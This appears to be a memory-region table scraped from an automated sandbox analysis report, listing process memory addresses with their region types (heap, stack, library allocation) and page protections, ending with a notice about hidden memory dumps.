||
|
21D94E4C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
22A84F82000
|
trusted library allocation
|
page read and write
|
||
|
2648F981000
|
heap
|
page read and write
|
||
|
7FFD9B8ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
2648F9FF000
|
heap
|
page read and write
|
||
|
142CCFD0000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
142CCFF0000
|
heap
|
page read and write
|
||
|
2648DA7B000
|
heap
|
page read and write
|
||
|
142CEC64000
|
heap
|
page read and write
|
||
|
2004D284000
|
heap
|
page read and write
|
||
|
142CF09A000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
22A82F96000
|
heap
|
page read and write
|
||
|
2648F5A8000
|
heap
|
page read and write
|
||
|
21D94840000
|
heap
|
page read and write
|
||
|
79F28FE000
|
stack
|
page read and write
|
||
|
2004D308000
|
heap
|
page read and write
|
||
|
7FFD9B8F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2648DB43000
|
heap
|
page read and write
|
||
|
2648F4F4000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
142CEC60000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2648F531000
|
heap
|
page read and write
|
||
|
2648F4F0000
|
heap
|
page read and write
|
||
|
D7CA9FF000
|
stack
|
page read and write
|
||
|
2648DA50000
|
heap
|
page read and write
|
||
|
142CD00C000
|
heap
|
page read and write
|
||
|
142CF130000
|
heap
|
page read and write
|
||
|
807200E000
|
stack
|
page read and write
|
||
|
22A9BB00000
|
trusted library section
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22A84C1E000
|
trusted library allocation
|
page read and write
|
||
|
22A82F00000
|
trusted library allocation
|
page read and write
|
||
|
D7CA3DA000
|
stack
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
142CEC6A000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2648F51D000
|
heap
|
page read and write
|
||
|
2648F522000
|
heap
|
page read and write
|
||
|
142CD00C000
|
heap
|
page read and write
|
||
|
2648DB17000
|
heap
|
page read and write
|
||
|
2648F56B000
|
heap
|
page read and write
|
||
|
142CF05B000
|
heap
|
page read and write
|
||
|
21D92E20000
|
heap
|
page read and write
|
||
|
142CF06B000
|
heap
|
page read and write
|
||
|
142CF034000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
142CF098000
|
heap
|
page read and write
|
||
|
2004D2DB000
|
heap
|
page read and write
|
||
|
22A8161E000
|
heap
|
page read and write
|
||
|
8070BF3000
|
stack
|
page read and write
|
||
|
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
|
142CEB81000
|
heap
|
page read and write
|
||
|
80712B7000
|
stack
|
page read and write
|
||
|
2648D9C0000
|
heap
|
page read and write
|
||
|
2648F584000
|
heap
|
page read and write
|
||
|
2648DD45000
|
heap
|
page read and write
|
||
|
22A8159B000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
2648F502000
|
heap
|
page read and write
|
||
|
22A82F30000
|
trusted library allocation
|
page read and write
|
||
|
22A838E7000
|
trusted library allocation
|
page read and write
|
||
|
22A937DE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2648DD4C000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
2648F543000
|
heap
|
page read and write
|
||
|
2648F53E000
|
heap
|
page read and write
|
||
|
142CF07D000
|
heap
|
page read and write
|
||
|
2648F4F9000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
2004CDE0000
|
heap
|
page read and write
|
||
|
2004B331000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
21D92DB0000
|
heap
|
page read and write
|
||
|
7FFD9B8E2000
|
trusted library allocation
|
page read and write
|
||
|
22A815C0000
|
heap
|
page read and write
|
||
|
2004D2F9000
|
heap
|
page read and write
|
||
|
22A944FE000
|
trusted library allocation
|
page read and write
|
||
|
2004D2CB000
|
heap
|
page read and write
|
||
|
2004D30A000
|
heap
|
page read and write
|
||
|
21D92E22000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
142CF032000
|
heap
|
page read and write
|
||
|
2004D3A5000
|
heap
|
page read and write
|
||
|
2648FA00000
|
heap
|
page read and write
|
||
|
22A84BE1000
|
trusted library allocation
|
page read and write
|
||
|
142CF030000
|
heap
|
page read and write
|
||
|
2004D5A0000
|
heap
|
page read and write
|
||
|
2648F4FF000
|
heap
|
page read and write
|
||
|
7FFD9BC93000
|
trusted library allocation
|
page read and write
|
||
|
142CF077000
|
heap
|
page read and write
|
||
|
22A81595000
|
heap
|
page read and write
|
||
|
142CF047000
|
heap
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
22A82E80000
|
heap
|
page read and write
|
||
|
2648F57C000
|
heap
|
page read and write
|
||
|
2004D2B7000
|
heap
|
page read and write
|
||
|
7FFD9B94C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4AED10000
|
trusted library allocation
|
page execute and read and write
|
||
|
22A82EE0000
|
trusted library allocation
|
page read and write
|
||
|
2004D2A2000
|
heap
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
21D92DF3000
|
heap
|
page read and write
|
||
|
22A82F90000
|
heap
|
page read and write
|
||
|
21D95340000
|
trusted library allocation
|
page read and write
|
||
|
22A848D6000
|
trusted library allocation
|
page read and write
|
||
|
21D94E8B000
|
trusted library allocation
|
page read and write
|
||
|
BD7AFF000
|
stack
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
22AC4190000
|
heap
|
page read and write
|
||
|
2648DAD7000
|
heap
|
page read and write
|
||
|
2648F577000
|
heap
|
page read and write
|
||
|
21D92E67000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D92EBD000
|
heap
|
page read and write
|
||
|
2648FA81000
|
heap
|
page read and write
|
||
|
21DACF77000
|
heap
|
page execute and read and write
|
||
|
22A834C0000
|
heap
|
page read and write
|
||
|
2648F511000
|
heap
|
page read and write
|
||
|
2004D284000
|
heap
|
page read and write
|
||
|
21DACE8F000
|
heap
|
page read and write
|
||
|
21D94D9C000
|
trusted library allocation
|
page read and write
|
||
|
79F2FFF000
|
stack
|
page read and write
|
||
|
2648F59C000
|
heap
|
page read and write
|
||
|
2648DD40000
|
heap
|
page read and write
|
||
|
22A815A0000
|
heap
|
page read and write
|
||
|
22A9B7A0000
|
heap
|
page execute and read and write
|
||
|
142CF064000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
142CD00C000
|
heap
|
page read and write
|
||
|
7FFD9B8E4000
|
trusted library allocation
|
page read and write
|
||
|
BD7EFE000
|
stack
|
page read and write
|
||
|
22AC42B0000
|
heap
|
page read and write
|
||
|
22AC4270000
|
heap
|
page read and write
|
||
|
2004B339000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
142CF091000
|
heap
|
page read and write
|
||
|
2648F4FA000
|
heap
|
page read and write
|
||
|
2648F5A2000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
807123E000
|
stack
|
page read and write
|
||
|
79F236A000
|
stack
|
page read and write
|
||
|
2004D2E0000
|
heap
|
page read and write
|
||
|
142CEC64000
|
heap
|
page read and write
|
||
|
22A851DA000
|
trusted library allocation
|
page read and write
|
||
|
21DAD350000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
142CF331000
|
heap
|
page read and write
|
||
|
2004D2CB000
|
heap
|
page read and write
|
||
|
2648FAF9000
|
heap
|
page read and write
|
||
|
2648DB17000
|
heap
|
page read and write
|
||
|
2648F59D000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
79F26FE000
|
stack
|
page read and write
|
||
|
2648F9DE000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D94846000
|
heap
|
page read and write
|
||
|
79F2AFF000
|
stack
|
page read and write
|
||
|
2648F568000
|
heap
|
page read and write
|
||
|
22A834D0000
|
heap
|
page read and write
|
||
|
21DA4D40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA94000
|
trusted library allocation
|
page read and write
|
||
|
80711F8000
|
stack
|
page read and write
|
||
|
2648F51D000
|
heap
|
page read and write
|
||
|
2004B32C000
|
heap
|
page read and write
|
||
|
21DA4D31000
|
trusted library allocation
|
page read and write
|
||
|
142CCFEB000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
142CEC64000
|
heap
|
page read and write
|
||
|
22A81600000
|
heap
|
page read and write
|
||
|
22A82EF0000
|
heap
|
page readonly
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
807117E000
|
stack
|
page read and write
|
||
|
21D94810000
|
heap
|
page readonly
|
||
|
142CECE4000
|
heap
|
page read and write
|
||
|
22A834E1000
|
trusted library allocation
|
page read and write
|
||
|
22AC43B0000
|
heap
|
page read and write
|
||
|
21D92ED5000
|
heap
|
page read and write
|
||
|
2648DA7C000
|
heap
|
page read and write
|
||
|
142D0EE0000
|
trusted library allocation
|
page read and write
|
||
|
22A9B5F0000
|
heap
|
page execute and read and write
|
||
|
BD7BFF000
|
stack
|
page read and write
|
||
|
22AC44B0000
|
direct allocation
|
page read and write
|
||
|
2004B339000
|
heap
|
page read and write
|
||
|
2648F53A000
|
heap
|
page read and write
|
||
|
2648F4FD000
|
heap
|
page read and write
|
||
|
142CD00C000
|
heap
|
page read and write
|
||
|
142CF037000
|
heap
|
page read and write
|
||
|
2004D2F3000
|
heap
|
page read and write
|
||
|
2648F980000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
D7CAAFE000
|
stack
|
page read and write
|
||
|
79F2BFE000
|
stack
|
page read and write
|
||
|
142CF089000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
21DAD080000
|
heap
|
page read and write
|
||
|
2648F56B000
|
heap
|
page read and write
|
||
|
2648DAD7000
|
heap
|
page read and write
|
||
|
7FFD9B91D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
2004D2A0000
|
heap
|
page read and write
|
||
|
2004CDE4000
|
heap
|
page read and write
|
||
|
2648F4F7000
|
heap
|
page read and write
|
||
|
21D92E24000
|
heap
|
page read and write
|
||
|
7FFD9BA82000
|
trusted library allocation
|
page read and write
|
||
|
2004D1A1000
|
heap
|
page read and write
|
||
|
22A81590000
|
heap
|
page read and write
|
||
|
22A934E1000
|
trusted library allocation
|
page read and write
|
||
|
54D6FFF000
|
stack
|
page read and write
|
||
|
21DAD084000
|
heap
|
page read and write
|
||
|
21D94D4B000
|
trusted library allocation
|
page read and write
|
||
|
22A83AFC000
|
trusted library allocation
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
2648DD4E000
|
heap
|
page read and write
|
||
|
54D727E000
|
stack
|
page read and write
|
||
|
21DACF70000
|
heap
|
page execute and read and write
|
||
|
2648DB17000
|
heap
|
page read and write
|
There are 578 hidden memdumps, click here to show them.